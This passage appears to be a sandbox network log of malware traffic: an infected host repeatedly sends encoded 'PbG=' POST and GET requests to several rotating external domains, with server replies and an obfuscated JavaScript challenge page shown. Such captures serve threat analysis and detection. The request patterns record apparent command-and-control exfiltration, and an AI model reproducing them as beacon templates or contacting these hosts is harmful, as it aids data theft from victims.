Oct 4, 2024 12:02:56.550703049 CEST | 5629 | OUT | request body (continued)
Oct 4, 2024 12:02:57.664015055 CEST | 383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:07 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.11.20 | 49804 | 31.217.192.158 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:59.282289982 CEST | 429 | OUT | GET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:03:01.168243885 CEST | 526 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:11 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.11.20 | 49805 | 191.101.104.164 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:06.278040886 CEST | 690 | OUT | POST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdJx5PPSeD1+8jQr7aR+fxUsRdPBx/DgsWhPTIC+LqXLOrUi8mPq6Gg6VclS6MwS25AlTaSCm+pj/3I8F6SSgeBYLNKSIza+V0tVy0ERVvE3nSS8vFUrzWRE80tizMZUDTVo6Ij2mLRVXuxSiNKoXcjymiucblZ8EFBeLDyF4+7djswcCcua0kbQ==
Oct 4, 2024 12:03:06.873116016 CEST | 425 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:06 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 163
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: /6s2u/
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 8d6a87c941d981c0a3cda304171662be-bos-edge4
                                                                                                                                                    Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>hcdn</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.11.20 | 49806 | 191.101.104.164 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:08.904134035 CEST | 710 | OUT | POST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdLRpPN1yDze8sO77aIuf9UsddPA1WCVEWgvjID/LqarOrMy8jAK67g9chlTGMwSy5AhXaTxexrz/1QMF4WSgeBYLNKWhWa+N0tFC0LQVoannVXMvFFbzSRE9htjv2ZRHTVpKIjkeIIlXk8yjiCqmxkASemcffeuwBNoaZv3Ma4O/e0s70sY1/GXryKfYGMFH1p6zR8JCI5b0=
Oct 4, 2024 12:03:09.004973888 CEST | 1003 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:08 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 149
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 9aeb5fa323d8e82ef1c26dd1cee21776-bos-edge2
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.11.20 | 49807 | 191.101.104.164 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:11.526844025 CEST | 1289 | OUT | POST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:03:11.526892900 CEST | 5626 | OUT | request body (continued)
Oct 4, 2024 12:03:11.627345085 CEST | 1003 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:11 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 149
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 65c4a942774adc74f6804865fdc49307-bos-edge4
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>


                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                    76 | 192.168.11.20 | 49808 | 191.101.104.164 | 80
                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                    Oct 4, 2024 12:03:14.152014017 CEST | 428 | OUT | GET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:03:14.253379107 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:14 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 4792
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 58e7463fe1aea6dfc0061e5240fcba10-bos-edge1
                                                                                                                                                    Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
                                                                                                                                                    Oct 4, 2024 12:03:14.253393888 CEST | 1289 | IN |
                                                                                                                                                    Data Ascii: #0000 10%,#000),linear-gradient(#000 0 0) content-box;-webkit-mask:var(--_m);mask:var(--_m);-webkit-mask-composite:source-out;mask-composite:subtract;animation:l3 1s infinite linear}@keyframes l3{to{transform:rotate(1turn)}}</style></head><bod
                                                                                                                                                    Oct 4, 2024 12:03:14.253732920 CEST | 1289 | IN |
                                                                                                                                                    Data Ascii: ncat','trace','{}.constructor(\x22return\x20this\x22)(\x20)','Content-Type','warn','1184299iAoMQM','send','info','apply','application/x-www-form-urlencoded','6689656NjkqqV','28DGQdGS','search','toString','9RrPAbC','(((.+)+)+)+$','__proto__','5
                                                                                                                                                    Oct 4, 2024 12:03:14.253771067 CEST | 1289 | IN |
                                                                                                                                                    Data Ascii: l++){var m=c[a3(0xe4,0xee)][a3(0xcb,0xd1)][a3(0xc8,0xbf)](c),n=k[l],o=j[n]||m;m[a3(0xdf,0xd8)]=c[a3(0xc8,0xba)](c),m[a3(0xdc,0xca)]=o['toString'][a3(0xc8,0xc2)](o),j[n]=m;}});b();var bbc6cf0=function a(z){function A(X,Y){return X>>>Y|X<<0x20-Y
                                                                                                                                                    Oct 4, 2024 12:03:14.253911018 CEST | 491 | IN |
                                                                                                                                                    Data Ascii: 4e5d(h){return new Promise(i=>setTimeout(i,h));}((async()=>{await f28b4e5d(0xbb8);function a5(h,i){return g(i- -0x18d,h);}const h=await bbc6cf0(cjs);xhr=new XMLHttpRequest(),xhr['open'](a5(-0x8c,-0x9d),jsChallengeUrl),xhr[a5(-0xb8,-0xc2)](a5(-


                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                    77 | 192.168.11.20 | 49809 | 162.255.119.150 | 80
                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                    Oct 4, 2024 12:03:19.382311106 CEST | 702 | OUT | POST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFqZhz9cl/U8jILOSTc4s89glSRlec8o1CwzMzaKbAeAtyKUGXxbcviT7CQh3ie2ORuX8af75oo8FhoM6EnSpx117Xh4F91lFXku/cCNfd0Rt5ApLHv8ELjVRNq6joLK/MaEDnXT0keO2dfoWaLVcZwgELDqj0s8QCoEKBFcpD1pnyEAsK6h2AqQ==
                                                                                                                                                    Oct 4, 2024 12:03:19.496412992 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:19 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                    78 | 192.168.11.20 | 49810 | 162.255.119.150 | 80
                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                    Oct 4, 2024 12:03:22.022593021 CEST | 722 | OUT | POST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFo65z77J/ScjJVeSTVYsw9gpSRkKM8aRC1j8zL/3AZAtyC0GY1bc0iT3KQgLie1yRuVkacIRrosFjgs6Gpypx117Xh4Rb1l9XkevcDpre9xt6HpLHlcEPjVR7q+jGLI3MaB/nGi0rUO2TRIXxKWlL5C4tGrftopV8gybbYudn267AAwVi4j3b3d91gC4/BrwQPHLIhEkMYRA=
                                                                                                                                                    Oct 4, 2024 12:03:22.136637926 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:22 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                    79 | 192.168.11.20 | 49811 | 162.255.119.150 | 80
                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                    Oct 4, 2024 12:03:24.663294077 CEST | 2578 | OUT | POST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG= [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:03:24.663364887 CEST | 4349 | OUT |
                                                                                                                                                    Data Ascii: k9qiAc4IxIwk6vnQbpTJJIXbWfBahBJ0sGdN1T8ekcJRdi0R1VplD3oTgsLVJfX0/sxk6vqj32KM91gh28VaFDfwgayxjQABCQD2xPPun8qBvL79dZKZwDKcQvo8ZLFody7711sasI2Nx90NuI1+0RSOndpP9/8WC2uzEz25eQi4ylGzN8+nXOaMh38Q6NAQcHPJWutylS+3v7TIzw00KqFBRtRaELxsA+YhM+KNrjXNL0v/r51
Oct 4, 2024 12:03:24.778285027 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:24 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.11.20 | 49812 | 162.255.119.150 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:27.302198887 CEST | 432 | OUT | GET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:03:27.416059017 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:27 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.11.20 | 49813 | 91.195.240.19 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:49.085659981 CEST | 681 | OUT | POST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaSswM1HGEtfrWdC+oZ9+6M7X0pJqUkbmqk2SrGwQCDFKyDfw502Zh6mR1/GGYRAId/UaakqJUvISKQMypRG//mH8/lwXoT8s+ktHx+IODgrMrP76vuahTJ6A0af/l2EOWZH2tZmZMkV65SlRJSwpbOBJTdUWWnMH86K8BeMaBRak3ZqvcRCFBBLA==
Oct 4, 2024 12:03:49.267256021 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.11.20 | 49814 | 91.195.240.19 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:51.786623001 CEST | 701 | OUT | POST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaS+jE1UV8tO7WSH+oZ2e7F7X4pJrRjaVOkzGvGiBCDAKyDUQ5L45hhmRJRGCcRAJ9/UYCkr68gHiKSHSpfbP/mH8/lwX9G8smkq3B+JsnnlsrMrKvuNxTV6A0sf9RMEMuZH3dZlIMjc65QqxI97ZqUJdbXaBuANWogPqQERo11Z3rrufl5AHAaWKpZUCKa3UmG3Pj9RBtmPfQ=
Oct 4, 2024 12:03:51.968463898 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
83 | 192.168.11.20 | 49815 | 91.195.240.19 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:54.489429951 CEST | 1289 | OUT | POST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:03:54.489484072 CEST | 5617 | OUT | Data Raw: 72 58 48 69 6f 31 5a 79 59 6c 33 41 37 6b 50 54 57 4d 37 5a 53 46 36 67 73 49 76 35 4a 70 46 79 2b 51 37 31 39 63 46 38 67 6e 4a 46 44 53 33 59 63 2b 30 4b 43 2b 4f 56 32 64 4c 58 59 75 36 7a 75 58 59 4a 47 4b 70 32 50 31 4a 6e 45 62 75 4d 47 47
